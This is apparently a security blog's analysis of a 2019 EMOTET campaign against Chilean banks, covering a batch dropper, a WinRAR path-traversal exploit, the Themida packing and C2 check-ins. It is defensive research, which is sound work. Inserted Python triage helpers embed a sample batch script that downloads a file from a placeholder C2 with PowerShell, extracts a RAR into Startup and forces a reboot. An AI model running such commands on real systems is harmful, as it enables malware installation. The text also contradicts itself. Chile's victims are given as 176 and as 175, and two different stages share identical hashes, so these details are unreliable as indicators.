The last days of March 2019 made headlines due to a targeted cyber attack involving a new variant of the infamous EMOTET malware. This threat is known as a banking trojan that collects financial information by injecting malicious code into a computer.
EMOTET has evolved in its delivery; however, this wave was conducted in its most prominent form: inserting malicious documents or URL links inside the body of an email, sometimes disguised as an invoice or PDF attachment.
According to SI-LAB, a total of 176 users from Chile were affected in a broad cyber threat that occurred between March 18th and 26th, 2019. Once again, the main goal of this campaign involving EMOTET was to exfiltrate financial credentials from users’ computers in order to access financial and banking services geolocated in Chile.
The first phase, identified as “__Denuncia_Activa_CL.PDF.bat”, is responsible for operating a crucial part of this threat. That file was delivered via malscam campaigns around the world and its source code is obfuscated in order to evade antivirus detection and complicate its analysis.
Interestingly, the first phase bypasses Virus Total (VT) detections. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living-off-the-land technique was used to become fully undetectable (FUD), which is the ultimate goal for malware authors.
The .bat file is a Windows batch script responsible for downloading a second stage from the Command & Control (C&C) server. The latter leverages the WinRar/Ace vulnerability (CVE-2018-20250) to drop the malware itself into the Windows startup folder. Next, the infected machine reboots and the malware becomes persistent through the system startup.
The high-level workflow of this campaign is illustrated below.
EMOTET was protected with a heavyweight commercial packer dubbed Themida, which introduced an additional protection layer that makes the sample harder to analyze. Other restrictions were also coded to prevent its execution in certain scenarios. In this case, for instance, the malware authors introduced several anti-run checks related to the victims’ geolocation and language preferences: only computers configured for Spain/Chile were compromised.
The Themida packer has a large set of features that criminals appreciate for protecting their threats. For example, it uses VM protection techniques, anti-debug protection, virtual machine emulation, anti-monitor techniques and anti-memory patching (see all Themida features here).
The first alert related to this wave was observed on March 22nd by the Computer Security Incident Response Team (CSIRT) of the Ministry of the Interior of Chile.
“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.
“Based on information obtained from internal sources, the cybersecurity alert situation was identified by an incident related to malicious software called EMOTET affected by the relevant sectors of the economy” – CSIRT Chile.
CSIRT released a comprehensive list of IP addresses associated with EMOTET that had to be blocked. A national alert was issued (below) and can be consulted at this URL.
SI-LAB detected that this attack started some days before the alerts were published. The second malware phase (denuncias.rar), which used the WinRar/Ace vulnerability (CVE-2018-20250) to drop the malware itself, was uploaded by criminals to the opendir C2 server on March 18th, 2019. As noted below in the Technical Analysis, the malware was uploaded again to another web folder on March 21st, maybe an update/change performed by its operators to improve functionality or to fix some bug.
As mentioned, EMOTET only executes on victims’ computers with Spain/Chile configured as their primary language, and this is an indicator that points to a targeted attack.
After several rounds to understand the malware, we found that some Chilean financial and banking organizations were targeted, including:
When the malware is executed without any restrictions, i.e., in a non-virtualized environment, some information from the victim’s computer is sent to the C2 server. The data includes the date/hour of infection, the victim’s remote IP address, the OS version and the antivirus name.
This information was available online on the opendir C2 server and SI-LAB analysed the data in order to understand the total number of infections and victims impacted by this targeted attack.
In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.
We built a GeoMap of Threats that aggregates the victims’ IP addresses collected from all the data on the opendir C2 server, based on their geolocation. Color intensity is correlated with the number of infections, the darkest red being equivalent to 175 infections in Chile.
As indicated on the GeoMap of Threats, Chile, the USA, Germany and France were the countries with the most hits observed by SI-LAB. From a total of 1089 infections, 175 victims were impacted in Chile, 162 in the USA, 137 in Germany and 132 in France.
The governmental agency CSIRT and the Cybersecurity National System of Chile are currently fighting this growing threat and have been working to increase awareness among users in the country. They encourage users to stay tuned to their computer security alerts.
For more details and the complete analysis of this malicious campaign, see the Technical Analysis below.
Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43
The last weeks of March 2019 were notable for the wrong reasons: a global cyber threat targeted financial institutions and banks in Chile via the EMOTET banking trojan.
This campaign was conducted via an initial malscam wave adding malicious documents or URL links inside the body of an email, sometimes disguised as an invoice or PDF attachment.
According to SI-LAB, 1089 users were impacted by this wave, 176 in Chile alone. This malware is not new and, once again, the main goal was the exfiltration of users’ credentials to access financial and banking services geolocated in Chile.
The first malware phase, identified as “__Denuncia_Activa_CL.PDF.bat”, is the maestro of all the operations carefully planned by the criminals. This file was delivered via malscam campaigns around the world and its code is obfuscated in order to evade antivirus detection and make its analysis harder. Figure 1 (below) shows the batch script encoded in little-endian UTF-16.
Figure 1: EMOTET malware obfuscated (encoded in Little-endian UTF-16) — the first phase.
After some rounds it was possible to recover the malware source code in ASCII. Let’s look at it below.
Figure 2: EMOTET malware deobfuscated — the first phase.
In general, the malicious batch script performs the following actions:
1. Generates a random name to rename the 2nd stage (dropper)
First, the malware generates a random name to rename the 2nd file downloaded from the C2 server (the stage that exploits the WinRar/Ace vulnerability, CVE-2018-20250). The latter will drop EMOTET itself into the Windows startup folder (discussed later).
In detail, on lines 33, 34 and 35 we can observe that the second stage is downloaded to the victim’s Downloads folder. The next image presents the output generated by the batch file.
Figure 3: Malware source-code output – the first phase.
2. Drops the 2nd stage: a PowerShell command is executed to drop the WinRar exploit, the ‘denuncias.rar’ file.
The 2nd stage is downloaded from the C2 server, renamed (“25RqcZpQ3.rar”) and placed into the “C:\Users\root\Downloads” folder.
Figure 4: Download path – the first phase.
As shown, this file is downloaded from an opendir C2 server. Note that the C2 server makes this file available in two different directories, namely:
Figure 5: 2nd stage available to download in two different directories.
3. Extracts EMOTET via WinRar: after the 2nd stage (‘denuncias.rar’) is downloaded, the file is executed and the malware itself (‘Integrity.exe’ – EMOTET) is dropped by the WinRar/ACE vulnerability into the Windows startup folder; see lines 38 – 42 in Figure 2.
4. Pings to simulate a delay
5. Reboots for malware persistence
Once the command shutdown -r is executed, Windows will reboot. This step establishes the malware’s persistence, since EMOTET, extracted from the 2nd stage, has already been placed in the Windows startup folder. While a normal reboot by the user would have the same effect, for some reason this campaign does not want to wait until the user initiates the reboot.
Upon reboot, the malicious program “Integrity.exe” (the EMOTET malware) gets into action and connects to the Command and Control (C&C) server.
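As an added example (not part of the original analysis), the following Python triage helper decodes a batch file the way the first stage was encoded (UTF-16LE, which hides keywords from ASCII-only string scanning) and flags the five behaviours listed above. The embedded script is a constructed sample with a placeholder URL, not the campaign's dropper.

```python
import re

# Constructed sample: a UTF-16LE batch file (with BOM) exhibiting the five behaviours
# described above. The URL is a placeholder, not the campaign's C2.
SAMPLE_BAT = ("\ufeff" + "\r\n".join([
    "@echo off",
    "set n=%random%%random%",
    "powershell -c \"(New-Object Net.WebClient).DownloadFile("
    "'http://C2-PLACEHOLDER/denuncias.rar', '%USERPROFILE%\\Downloads\\%n%.rar')\"",
    "\"C:\\Program Files\\WinRAR\\WinRAR.exe\" x -y \"%USERPROFILE%\\Downloads\\%n%.rar\"",
    "ping 127.0.0.1 -n 10 > nul",
    "shutdown -r -t 0",
])).encode("utf-16-le")

# One regex per step of the batch script described in the article
STAGE_RULES = [
    ("powershell_download", re.compile(r"powershell.*(downloadfile|downloadstring|invoke-webrequest)", re.I)),
    ("rar_into_downloads", re.compile(r"downloads\\[^\s\"']+\.rar", re.I)),
    ("winrar_extract", re.compile(r"\b(winrar|unrar)(\.exe)?\b.*\s[xe]\s", re.I)),
    ("ping_delay", re.compile(r"\bping\b.*\s-n\s+\d+", re.I)),
    ("forced_reboot", re.compile(r"\bshutdown\b.*(\s/r|\s-r)\b", re.I)),
]

def decode_script(raw: bytes) -> str:
    """Decode by BOM sniffing; UTF-16 text hides ASCII keywords from naive scanners."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le", "replace")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", "replace")
    # No BOM: a NUL in every other byte is the telltale sign of bare UTF-16LE
    if len(raw) > 1 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", "replace")
    return raw.decode("latin-1")

def triage_batch(raw: bytes) -> list:
    """Return the sorted names of the first-stage behaviours found in the script."""
    text = decode_script(raw)
    hits = {name for line in text.splitlines()
            for name, rx in STAGE_RULES if rx.search(line)}
    return sorted(hits)

if __name__ == "__main__":
    print(triage_batch(SAMPLE_BAT))
```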
Figure 6: Infection graph generated and extracted from Virus Total.
Interestingly, the first phase bypasses Virus Total (VT) detections. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living-off-the-land technique was used to become fully undetectable (FUD), which is the ultimate goal for malware authors.
Figure 7: No detections were identified by VT.
Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43
Looking inside the dropper, we can observe interesting artifacts.
Figure 8: Hex code from ‘denuncias.rar’ file — EMOTET dropper.
As shown, the string “C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe” is found. In fact, this is CVE-2018-20250 just saying “hello world, I’m here!”
In detail, if UAC is running, an attempt to extract the archive will fail to place the malware in the “C:\ProgramData” folder due to lack of permissions. This causes WinRAR to display an error stating “Access is denied” and “operation failed”.
On the other hand, if UAC is disabled or WinRAR is run with administrator privileges, it will install the malware to the following path:
By extracting all the files we can obtain and analyse the malware itself.
Figure 9: EMOTET malware (‘Integrity.exe’) dropped by the 2nd stage.
More details on CVE-2018-20250 here.
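As an added example (not from the original analysis), this Python check applies the rule a patched extractor should enforce before writing any archive entry: resolve where the entry name would land and reject anything that leaves the extraction directory or points at an autostart folder. The extraction directory is an assumed placeholder; the traversal string is the one shown in the dump above.

```python
import ntpath
import re

EXTRACT_DIR = r"C:\Users\victim\Downloads"   # assumed extraction directory (placeholder)
STARTUP_RX = re.compile(r"\\start[ .]menu\\programs\\startup\\", re.I)

def resolve_target(entry: str, extract_dir: str = EXTRACT_DIR) -> str:
    """Where a naive extractor would write the entry: join, then collapse '..' as NTFS would."""
    return ntpath.normpath(ntpath.join(extract_dir, entry.replace("/", "\\")))

def check_entry(entry: str, extract_dir: str = EXTRACT_DIR) -> dict:
    """Reject an archive entry whose name cannot stay inside extract_dir."""
    norm = entry.replace("/", "\\")
    first = norm.split("\\")[0]
    base = ntpath.normpath(extract_dir)
    target = resolve_target(norm, extract_dir)
    reasons = []
    if re.match(r"^[A-Za-z]:", first):
        reasons.append("drive_prefix")            # 'C:..' style prefix seen in the dump above
    if norm.startswith("\\"):
        reasons.append("rooted_or_unc")           # '\abs' or '\\server\share'
    if ".." in norm.split("\\") or re.match(r"^[A-Za-z]:\.\.$", first):
        reasons.append("parent_traversal")
    try:
        escapes = ntpath.commonpath([base, target]) != base
    except ValueError:                             # other drive, or relative vs absolute
        escapes = True
    if escapes:
        reasons.append("escapes_extract_dir")
    if STARTUP_RX.search(target):
        reasons.append("autostart_location")      # landing in a Startup folder means persistence
    return {"entry": entry, "target": target, "reject": bool(reasons), "reasons": reasons}

# The traversal name from the dropper's hex dump, beside a benign relative entry
DROPPER_ENTRY = r"C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe"
BENIGN_ENTRY = "docs/report.pdf"

if __name__ == "__main__":
    for e in (DROPPER_ENTRY, BENIGN_ENTRY):
        print(check_entry(e))
```

The resolved target shows why the page calls this the startup folder: relative to the Downloads directory, the leading `C:..` climbs into the user's profile and `Start.Menu\Programs\Startup` sits right there.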
Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08
Digging into the last malware infection stage, we face the EMOTET banking trojan: a credential stealer that has been infecting users from Chile in recent months.
At first glance, the malware is protected with the Themida 2.x packer. This is bad news for malware analysts.
Unpacking Themida, especially the newer versions, is not a small task by any means. Themida uses an extremely complex virtual machine environment combined with every anti-debug and anti-analysis trick in the book, along with many different obfuscation methods.
In a Themida binary, different parts of the code run inside virtual machines, which obscures the behavior of the target program. The best method to unpack a VM-protected packer like Themida is to devirtualize it, which involves figuring out the entire instruction set that the packer uses and writing a script to interpret that language.
Figure 10 shows that the binary was developed in Delphi; nonetheless, we will not decompile it, because Themida is very hard to unpack and that task is extremely complex.
Figure 10: Packer and compiler detected — Themida 2.x and Delphi.
As we can see below (Figures 11 and 12), and reinforcing the packer’s presence, some sections have null names and others have high entropy (around 8.0). This is a clear signal that we are facing a challenge: the Themida packer!
Figure 10: EMOTET section entropy.
Figure 11 below illustrates, in its middle part, that a great part of this file is really packed.
Figure 11: Emotet file entropy.
Another perfect indicator that Themida is present is the PE file’s import table (IAT). The IAT is partially destroyed and just one function from the kernel32.dll DLL can be observed: lstrcpy.
Figure 12: EMOTET IAT (result from Themida packer).
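As an added example (not the author's tooling), the following Python walks a PE section table without third-party libraries and applies the two heuristics just described: nameless sections and entropy close to 8.0. The sample image is a constructed header-plus-sections blob, not the EMOTET binary.

```python
import math
import struct

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed (packed) bytes."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_sections(pe: bytes):
    """Walk the section table by hand (no pefile) and return (name, entropy, raw_size) rows."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]   # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size
    rows = []
    for i in range(nsec):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)   # SizeOfRawData, PointerToRawData
        rows.append((name, round(shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]), 2), raw_size))
    return rows

def packer_indicators(rows, threshold=7.5):
    """The two signs the article points at: nameless sections and near-8.0 entropy."""
    return {"unnamed": [r for r in rows if r[0] == ""],
            "high_entropy": [r for r in rows if r[1] >= threshold]}

def build_sample_pe(sections):
    """Constructed minimal PE-shaped blob: DOS stub, COFF header, section table, raw data."""
    e_lfanew = 0x40
    body_start = e_lfanew + 24 + 40 * len(sections)   # SizeOfOptionalHeader is 0 here
    table, body = b"", b""
    for name, data in sections:
        ptr = body_start + len(body)
        table += name.ljust(8, b"\0") + struct.pack("<IIII", len(data), 0, len(data), ptr) + b"\0" * 16
        body += data
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    return dos + coff + table + body

# Constructed sample: a plain code section beside a nameless, uniformly distributed one
SAMPLE = [(b".text", b"\x90" * 512), (b"", bytes(range(256)) * 8)]
```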
The Themida packer is, in fact, a constant challenge for malware analysts. The approach we used to inspect the malware file was to dump it from memory while it is running. Nevertheless, remember that only small pieces of code are devirtualized by Themida during execution. And keep in mind that Themida’s anti-monitor techniques will also detect file and registry monitors.
First, the virtual machine needs to be tuned to simulate the infection scenario as realistically as possible. For this, we need to change the system language preferences to Spain/Chile and adjust some keys in the Windows Registry, since the malware reads these values to detect analysis environments.
Figure 13: Changes performed in the HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | SystemBiosDate and VideoBiosVersion registry values.
But nothing is perfect. The malware constantly checks the processes running on the system and terminates if any of the processes it looks for is found (this is an evasion technique provided by the Themida packer and documented here). This is one of the many features of this modern packer.
Getting back to EMOTET, after dumping it from memory we observed some things, such as some imported DLLs and the malware strings.
Only a few blocks of EMOTET can be analysed, as Themida runs on a virtual machine environment. Thus, malware functions are devirtualized in real time, and we cannot fix the IAT properly either.
Figure 14: DLLs imported by EMOTET and anti-VM and anti-dbg techniques detected in this specific memory dump.
After dumping it from memory, we observe that only some DLLs are rebuilt. We suspect that the other ones remain hidden. Both anti-VM and anti-debug techniques were detected again after dumping the malware. This is nothing new!
However, some info can be extracted from the binary. When it is executed on victims’ computers, initial info is sent to the C2 server (a kind of “EHLO” message with some arguments).
Figure 15: EMOTET C2 server URL.
Information sent includes:
Figure 16 presents a query performed by the malware in order to identify the antivirus product running on the infected machine. Winmgmts is a WMI service within the SVCHOST process running under the “LocalSystem” account.
Figure 16: EMOTET collects antivirus product name via WMI query.
The file “up.php” writes all the entries to another file called “tictic.txt”. Every time a victim is infected, an EHLO request is sent to “up.php”, which writes the infection data highlighted above into this file.
Figure 17: EMOTET C2 files available in an opendir.
Through this file, available on the opendir C2, it was possible to build the GeoMap of Threats presented at the beginning of the article.
After processing the data we detected that 1089 users were infected during this campaign. As pointed out, Chile, the USA, Germany and France were the countries with the most hits. From a total of 1089, 175 victims were impacted in Chile, 162 in the USA, 137 in Germany and 132 in France.
But it is important to answer this question: what kind of data is collected by this banking trojan? Banking credentials, of course.
EMOTET drops a sqlite3.dll DLL during its execution in order to read data from the SQLite databases of the popular installed web browsers.
Figure 18: EMOTET collects data from main popular web-browsers.
During static analysis it was also possible to observe the targeted banks and financial institutions involved in this attack, namely:
Figure 19: Banks and financial institutions involved in this attack.
Figure 20 (below) shows one of the last administration panels used by EMOTET in its recent infections.
Figure 20: Administration panel used in recent variants by EMOTET.
Another interesting aspect is the following string, observed in past EMOTET infections and hardcoded inside many malware samples.
This is a drag’n’drop interface support file for Delphi 5, 6, 7, 2005, 2006 & C++Builder. We could not retrieve any more information about this library in the malware.
During this analysis we detected that the malware performs several connections to “www.bing.com”, maybe to validate a successful connection to the Internet.
Figure 21: Internet connection is validated during EMOTET execution.
Curiously, after several memory dumps we noticed that some interesting strings change in memory. At a specific moment we got the following:
These seem to be encrypted strings with specific information about banking systems (maybe endpoints; we don’t know).
One way to understand the malware completely is to devirtualize the entire code. As shown, the Themida packer makes malware analysis harder and that was a big challenge during this investigation.
Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.
About the author Pedro Tavares
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and